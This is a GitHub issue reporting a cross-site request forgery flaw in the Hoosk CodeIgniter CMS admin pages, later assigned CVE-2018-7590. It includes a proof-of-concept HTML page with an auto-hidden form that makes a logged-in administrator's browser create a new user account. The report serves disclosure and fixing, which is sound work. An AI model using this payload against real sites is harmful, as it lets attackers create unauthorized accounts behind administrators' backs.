search

havok89 / Hoosk

Hoosk Codeigniter CMS
http://hoosk.org
Other
128 stars 87 forks source link

CSRF issue that allows attacker to create an account #45

Closed fvi-att closed 4 years ago

fvi-att commented 6 years ago

Hello. I want to report it has CSRF issue in admin pages. When attacker induce authenticated admin user to a malicious web page, the account will be created without admin user's intention.

Here is how to reproduce the issue.

  1. Login to admin page.(/admin)

  2. Keep login and access the html it has following content

    <html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://your.content.example.com" method="POST">
  <input type="hidden" name="username" value="test1" />
  <input type="hidden" name="email" value="test1&#64;example&#46;com" />
  <input type="hidden" name="password" value="test" />
  <input type="hidden" name="con&#95;password" value="test" />
  <input type="hidden" name="submit" value="Save" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>
    1. And account username = test1 is created without admin user's intention.
fvi-att commented 6 years ago

CVE-2018-7590 is assigned.